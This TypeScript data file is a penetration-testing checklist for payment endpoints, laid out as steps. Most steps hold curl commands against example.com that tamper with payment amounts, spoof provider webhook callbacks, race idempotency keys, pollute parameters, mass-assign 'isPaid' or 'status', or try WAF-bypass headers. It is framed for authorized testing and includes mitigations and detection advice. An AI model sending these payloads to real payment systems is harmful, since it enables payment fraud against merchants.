export interface PaymentStep {
  id: string
  title: string
  description: string
  commands: { command: string; description: string }[]
  tools?: { name: string; url: string; description: string }[]
  tips?: string[]
}

export const paymentSteps: PaymentStep[] = [
  {
    id: "note",
    title: "Important Note",
    description: "This document is for authorized security testing and CTF use only. Do not use on systems you do not have permission to test.",
    commands: [],
    tips: [
      "Always obtain proper authorization before testing",
      "Use on systems you have explicit permission to test",
      "Keep detailed logs of all testing activities",
    ],
  },
  {
    id: "purpose",
    title: "Purpose & Threat Model",
    description: "Practical, attack-oriented checklist to test for payment-amount tampering and 403 bypasses. Goal: cause system to accept payment with attacker-controlled/incorrect amount or bypass authorization.",
    commands: [],
    tips: [
      "Focus on high-value checks",
      "Clear PoCs and observables",
      "Reproducible minimal proofs emphasized",
    ],
  },
  {
    id: "methodology",
    title: "Testing Methodology",
    description: "Follow this practical approach for payment testing.",
    commands: [
      { command: "Baseline: Record normal successful payment and rejected request (403/4xx)", description: "Step 1 - Establish baseline" },
      { command: "Single-variable changes: Change one field at a time", description: "Step 2 - Test mutations" },
      { command: "Layered tests: Combine encoding + duplicate params + content type", description: "Step 3 - Combined testing" },
      { command: "Observe differences: HTTP code, body, headers, logs", description: "Step 4 - Analyze results" },
      { command: "Reproduce minimal PoC once positive", description: "Step 5 - Minimal repro" },
      { command: "Document & mitigate with clear steps", description: "Step 6 - Document" },
    ],
    tools: [
      { name: "Burp Suite", url: "https://portswigger.net/burp", description: "Repeater/Intruder for testing" },
      { name: "Postman", url: "https://postman.com", description: "API testing tool" },
      { name: "Python requests", url: "https://docs.python-requests.org", description: "Scripting and automation" },
    ],
    tips: [
      "Capture exact request and response",
      "Note server-side calculated totals if visible",
      "Use logging capture for timestamps",
    ],
  },
  {
    id: "simple-tampering",
    title: "1) Simple Tampering",
    description: "Submit requests where amount is changed from expected value.",
    commands: [
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": 403, \"productId\":123}' https://example.com/pay", description: "Basic amount tampering" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": 1000, \"productId\":123}' https://example.com/pay", description: "Higher amount test" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": 1, \"productId\":123}' https://example.com/pay", description: "Minimal amount test" },
    ],
    tips: [
      "Note status codes: 200/201 (accepted), 400 (bad request), 403 (forbidden), 500 (server error)",
      "Confirms whether server validates client-supplied amount",
      "Server should compute price from productId, ignore client amount",
    ],
  },
  {
    id: "precision-rounding",
    title: "2) Precision & Rounding Edge Cases",
    description: "Send decimal/fractional values to test rounding behavior.",
    commands: [
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": 403.0000001, \"productId\":123}' https://example.com/pay", description: "Fractional overcharge" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": 402.9999999, \"productId\":123}' https://example.com/pay", description: "Fractional undercharge" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": 0.01, \"productId\":123}' https://example.com/pay", description: "Minimum decimal" },
    ],
    tips: [
      "Watch for off-by-one cent issues",
      "Float handling can allow acceptance",
      "Use integer cents (minor units) server-side",
    ],
  },
  {
    id: "negative-values",
    title: "3) Negative/Void Values & Signs",
    description: "Send negative, signed, or zero values.",
    commands: [
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": -403, \"productId\":123}' https://example.com/pay", description: "Negative amount" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": +403, \"productId\":123}' https://example.com/pay", description: "Explicit positive" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": 0, \"productId\":123}' https://example.com/pay", description: "Zero amount" },
    ],
    tips: [
      "Server may treat negative as refund/credit",
      "Some systems coerce to absolute value",
      "Reject negative amounts on payment endpoints",
    ],
  },
  {
    id: "type-confusion",
    title: "4) Type Confusion & Alternate Encodings",
    description: "Change type/format of amount or encode differently.",
    commands: [
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": \"403\", \"productId\":123}' https://example.com/pay", description: "String amount" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": 4.03e2, \"productId\":123}' https://example.com/pay", description: "Scientific notation" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": \"00403\", \"productId\":123}' https://example.com/pay", description: "Padded zeros" },
    ],
    tips: [
      "Type coercion bugs can cause bypass",
      "Different parsing layers may interpret differently",
      "Canonicalize type server-side",
    ],
  },
  {
    id: "currency-mismatch",
    title: "5) Currency Mismatch & Units Confusion",
    description: "Submit amounts in minor units vs major units, or mismatch currency field.",
    commands: [
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": 403, \"currency\":\"USD\", \"productId\":123}' https://example.com/pay", description: "Currency mismatch" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": 40300, \"currency\":\"cents\", \"productId\":123}' https://example.com/pay", description: "Minor units confusion" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": 0.403, \"currency\":\"USD\", \"productId\":123}' https://example.com/pay", description: "Decimal misinterpretation" },
    ],
    tips: [
      "Server may misinterpret currency units",
      "Trusting client currency leads to financial loss",
      "Compute currency entirely on server",
    ],
  },
  {
    id: "productid-override",
    title: "6) Price Override by productId Mismatch",
    description: "Keep amount low but change productId to different product.",
    commands: [
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": 1, \"productId\": 999}' https://example.com/pay", description: "Low amount, different product" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\": 403, \"productId\": 456}' https://example.com/pay", description: "Amount for different product" },
    ],
    tips: [
      "Server should compute price from productId",
      "If server trusts client amount, attacker can pay less",
      "Always server-side compute final price",
    ],
  },
  {
    id: "callback-manipulation",
    title: "7) Replay / Callback Manipulation",
    description: "Replay legitimate provider callbacks or send spoofed callbacks.",
    commands: [
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"paymentId\":\"123\",\"amount\":100,\"status\":\"SUCCESS\"}' https://example.com/callback", description: "Spoofed callback - correct amount" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"paymentId\":\"123\",\"amount\":403,\"status\":\"SUCCESS\"}' https://example.com/callback", description: "Spoofed callback - tampered amount" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"paymentId\":\"123\",\"amount\":1,\"status\":\"SUCCESS\"}' https://example.com/callback", description: "Callback with minimal amount" },
    ],
    tips: [
      "Many systems trust webhook without signature verification",
      "Verify provider signatures (HMAC)",
      "Reconcile with provider API before marking order paid",
    ],
  },
  {
    id: "idempotency-race",
    title: "8) Idempotency & Race Conditions",
    description: "Send concurrent conflicting requests using same idempotencyKey.",
    commands: [
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":403,\"idempotencyKey\":\"key1\",\"productId\":123}' https://example.com/pay", description: "First request - correct amount" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":1,\"idempotencyKey\":\"key1\",\"productId\":123}' https://example.com/pay", description: "Second request - tampered amount" },
    ],
    tips: [
      "Race may lead to inconsistent canonicalization",
      "Use transactional locks",
      "Bind idempotencyKey to canonical computed amount",
    ],
  },
  {
    id: "parameter-pollution",
    title: "9) Duplicate Parameter Pollution",
    description: "Send amount in multiple places or duplicate keys.",
    commands: [
      { command: "curl -X POST 'https://example.com/pay?amount=1' -H \"Content-Type: application/json\" -d '{\"amount\":403}'", description: "Query vs body conflict" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":1,\"amount\":403}' https://example.com/pay", description: "Duplicate JSON keys" },
      { command: "curl -X POST -d 'amount=1&amount=403' https://example.com/pay", description: "Form duplicate params" },
    ],
    tips: [
      "Different parsers may handle differently",
      "Check which value is actually used",
      "Test with Burp Intruder",
    ],
  },
  {
    id: "content-type-parser",
    title: "10) Content-Type Parser Differences",
    description: "Send same data with different Content-Types.",
    commands: [
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":403}' https://example.com/pay", description: "JSON" },
      { command: "curl -X POST -H \"Content-Type: application/x-www-form-urlencoded\" -d 'amount=403' https://example.com/pay", description: "Form URL encoded" },
      { command: "curl -X POST -H \"Content-Type: multipart/form-data\" -d 'amount=403' https://example.com/pay", description: "Multipart form" },
    ],
    tips: [
      "Different parsers may be used",
      "Test all Content-Type variations",
      "Look for parsing differentials",
    ],
  },
  {
    id: "encoding-tricks",
    title: "11) Encoding Tricks",
    description: "Encode amount or productId to see if decoders alter interpretation.",
    commands: [
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":\"%34%30%33\"}' https://example.com/pay", description: "Percent encoded string" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":\"NDAz\"}' https://example.com/pay", description: "Base64 encoded" },
    ],
    tips: [
      "Downstream decoders may alter interpretation",
      "Test various encoding methods",
      "Check for double encoding",
    ],
  },
  {
    id: "observables",
    title: "Observables Checklist",
    description: "What to capture during testing.",
    commands: [
      { command: "HTTP status and full body for each test", description: "Status codes and response" },
      { command: "Response headers: Location, Set-Cookie, X- headers", description: "Headers to capture" },
      { command: "Content-Length changes and body diffs", description: "Diff analysis" },
      { command: "Provider dashboard entries (transaction amount, status)", description: "External logs" },
      { command: "Server logs / webhook logs if accessible", description: "Server-side logs" },
    ],
    tips: [
      "Use Burp comparators for diffs",
      "Screenshot evidence when possible",
      "Document timestamps and request IDs",
    ],
  },
  {
    id: "automation",
    title: "Automation Templates",
    description: "Python scripts for testing payment endpoints.",
    commands: [
      { command: "import requests; url='...'; tests=[{'amount':403},{'amount':1}]; [print(requests.post(url,json=p).status_code) for p in tests]", description: "Basic Python test" },
      { command: "Use threading for concurrent requests to test race conditions", description: "Race condition testing" },
    ],
    tools: [
      { name: "Python requests", url: "https://docs.python-requests.org", description: "HTTP library" },
      { name: "Burp Intruder", url: "https://portswigger.net/burp", description: "Automated testing" },
    ],
    tips: [
      "Use only in staging/sandbox",
      "Implement throttling",
      "Never test real financial endpoints",
    ],
  },
  {
    id: "mitigations",
    title: "Concrete Mitigations Checklist",
    description: "Key security measures for developers.",
    commands: [
      { command: "Server-side authoritative pricing from productId", description: "Mitigation #1" },
      { command: "Integer minor units (cents) for money", description: "Mitigation #2" },
      { command: "Canonicalize incoming amount formats", description: "Mitigation #3" },
      { command: "Strict type validation - reject strings/floats", description: "Mitigation #4" },
      { command: "Currency enforcement - server maps product currency", description: "Mitigation #5" },
      { command: "Webhook signature verification (HMAC)", description: "Mitigation #6" },
      { command: "Idempotency consistency - bind to canonical amount", description: "Mitigation #7" },
      { command: "Transaction atomicity with DB locks", description: "Mitigation #8" },
      { command: "Reject negative amounts on payment endpoints", description: "Mitigation #9" },
      { command: "Rate limiting on payment attempts", description: "Mitigation #10" },
    ],
    tips: [
      "Prioritize: server authoritative pricing > webhook verification > idempotency",
      "Regular reconciliation with payment provider",
      "Monitor unusual patterns",
    ],
  },
  {
    id: "waf-bypass",
    title: "WAF Bypass & PoCs - Payment Amount 403 Bypass",
    description: "Practical, attack-oriented playbook for payment-amount tampering and 403 bypasses. Goal: cause system to accept attacker-controlled/incorrect amount or bypass authorization. Attacker controls HTTP requests to payment endpoints, webhooks, idempotency keys. Assumes server may trust client calculations, have type coercion bugs, multiple parsing layers, or accept unverified callbacks.",
    commands: [
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":403,\"productId\":123}' https://example.com/pay", description: "[1] Simple tamper - baseline amount" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":1,\"productId\":123}' https://example.com/pay", description: "[1] Simple tamper - minimal amount" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":403.0000001,\"productId\":123}' https://example.com/pay", description: "[2] Precision - fractional overcharge" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":402.9999999,\"productId\":123}' https://example.com/pay", description: "[2] Precision - fractional undercharge" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":-403,\"productId\":123}' https://example.com/pay", description: "[3] Negative - void/credit amount" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":0,\"productId\":123}' https://example.com/pay", description: "[3] Negative - zero amount" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":\"403\",\"productId\":123}' https://example.com/pay", description: "[4] Type confusion - string amount" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":4.03e2,\"productId\":123}' https://example.com/pay", description: "[4] Type confusion - scientific notation" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":\"00403\",\"productId\":123}' https://example.com/pay", description: "[4] Type confusion - padded zeros" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":403,\"currency\":\"USD\",\"productId\":123}' https://example.com/pay", description: "[5] Currency mismatch" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":40300,\"productId\":123}' https://example.com/pay", description: "[5] Units - cents vs dollars" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":1,\"productId\":999}' https://example.com/pay", description: "[6] productId override - cheap item, expensive product" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"paymentId\":\"123\",\"amount\":1,\"status\":\"SUCCESS\"}' https://example.com/callback", description: "[7] Callback spoof - minimal amount" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"paymentId\":\"123\",\"amount\":403,\"status\":\"SUCCESS\"}' https://example.com/callback", description: "[7] Callback spoof - tampered amount" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":403,\"idempotencyKey\":\"key1\",\"productId\":123}' https://example.com/pay", description: "[8] Idempotency race - correct amount" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":1,\"idempotencyKey\":\"key1\",\"productId\":123}' https://example.com/pay", description: "[8] Idempotency race - tampered amount" },
      { command: "curl -X POST 'https://example.com/pay?amount=1' -H \"Content-Type: application/json\" -d '{\"amount\":403}'", description: "Advanced: query vs body param pollution" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":1,\"amount\":403}' https://example.com/pay", description: "Advanced: duplicate JSON keys" },
      { command: "curl -X POST -H \"Content-Type: application/x-www-form-urlencoded\" -d 'amount=403' https://example.com/pay", description: "Advanced: form-urlencoded parser bypass" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":\"%34%30%33\"}' https://example.com/pay", description: "Advanced: percent-encoded amount" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":\"NDAz\"}' https://example.com/pay", description: "Advanced: base64-encoded amount" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":null,\"productId\":123}' https://example.com/pay", description: "Advanced: null injection" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":403,\"isPaid\":true,\"productId\":123}' https://example.com/pay", description: "Advanced: mass assignment - isPaid" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":403,\"status\":\"PAID\",\"productId\":123}' https://example.com/pay", description: "Advanced: mass assignment - status" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":403,\"productId\":123}' -H \"X-Forwarded-For: 127.0.0.1\" https://example.com/pay", description: "WAF bypass: IP header injection" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":1}' -H \"Transfer-Encoding: chunked\" https://example.com/pay", description: "WAF bypass: HTTP smuggling technique" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":403,\"productId\":123}' -H \"X-HTTP-Method-Override: GET\" https://example.com/pay", description: "WAF bypass: method override header" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":\"\\u0034\\u0030\\u0033\"}' https://example.com/pay", description: "WAF bypass: unicode escape" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\"amount\":403,\"productId\":123}' -H \"Content-Type: text/plain\" https://example.com/pay", description: "WAF bypass: content-type confusion" },
      { command: "curl -X POST -H \"Content-Type: application/json\" -d '{\" Amount \":403,\"productId\":123}' https://example.com/pay", description: "WAF bypass: whitespace in keys" },
      { command: "curl -X POST 'https://example.com/pay?%00amount=1' -H \"Content-Type: application/json\" -d '{\"amount\":403}'", description: "WAF bypass: null byte in param" },
    ],
    tools: [
      { name: "Burp Suite", url: "https://portswigger.net/burp", description: "Repeater/Intruder/Comparators for bypass testing" },
      { name: "Postman", url: "https://postman.com", description: "API testing tool for manual requests" },
      { name: "Python requests", url: "https://docs.python-requests.org", description: "Scripting automation for single and race tests" },
      { name: "wfuzz", url: "https://wfuzz.github.io/wfuzz/", description: "Fuzzing tool for WAF bypass vectors" },
      { name: "ffuf", url: "https://github.com/ffuf/ffuf", description: "Fast web fuzzer for parameter discovery" },
    ],
    tips: [
      "=== THREAT MODEL ===",
      "Goal: achieve acceptance of incorrect amount or bypass 403 authorization",
      "Attacker capabilities: send/replay HTTP requests, control callbacks, idempotency keys, input fields",
      "Assumption: server may trust client-side calculations, have type coercion, multiple parsing layers",
      "Never test on real financial endpoints without explicit permission",

      "=== METHODOLOGY (6 steps) ===",
      "1. Baseline: record normal successful payment and rejected (403/4xx) - capture exact request/response",
      "2. Single-variable changes: change one field at a time (type, format, encoding, currency, productId)",
      "3. Layered/combined: encoding + duplicate params + content-type + idempotency for parser disagreements",
      "4. Observe differences: HTTP code, body, Content-Length, headers, provider dashboard, created orders",
      "5. Reproduce minimal PoC: once positive, reduce payload to minimal vector",
      "6. Document & mitigate: produce clear steps for devs to reproduce and fix",

      "=== OBSERVABLES CHECKLIST ===",
      "Capture HTTP status and full body for each test (200/201 vs 4xx/5xx)",
      "Capture response headers: Location, Set-Cookie, custom X- headers, rate-limit headers",
      "Track Content-Length changes and body diffs using Burp comparator",
      "Check provider dashboard entries for transaction amounts and status",
      "Review server logs / webhook logs for timestamps and request IDs",
      "Inspect created DB records: order total, payment amount, invoice",
      "Note any tokens or receipts returned that could be exploited later",

      "=== DETECTION & LOGGING ===",
      "Log canonical source of amount (server computed vs client provided) in audit logs",
      "Require and log webhook signature verification failures - accept only signed callbacks",
      "Alert on mismatches between product price (server) and payment amount (client)",
      "Monitor: rapid retries with same idempotencyKey but varying amounts",
      "Monitor: high variance in decimal precision and negative amounts",
      "Regularly reconcile payment provider transactions with internal order amounts",

      "=== PoC PROCEDURE ===",
      "Baseline: place order for productId=123, server expects $403 - record response",
      "Test simple tamper: change amount to 1 - if accepted, screenshot order/payment records",
      "If server rejects but callback accepts: replay legitimate callback with lower amount",
      "Reduce to minimal payload that causes acceptance - document exact fields and sequence",

      "=== PRIORITY ===",
      "Most fruitful: type confusion + duplicate params, webhook spoof + missing signature, idempotency race",
      "Prioritize: server authoritative pricing > webhook verification > idempotency logic > canonicalization",
      "Report: include exact raw requests, server responses, provider evidence, minimal repro",
    ],
  },
  {
    id: "final-notes",
    title: "Final Notes",
    description: "Most fruitful finds are combinations: type confusion + duplicate params, webhook spoof + missing signature checks, or idempotency race.",
    commands: [],
    tips: [
      "Test combined paths first",
      "Include exact raw requests in reports",
      "Provide minimal reproducible PoC",
      "Prioritize findings by impact",
    ],
  },
]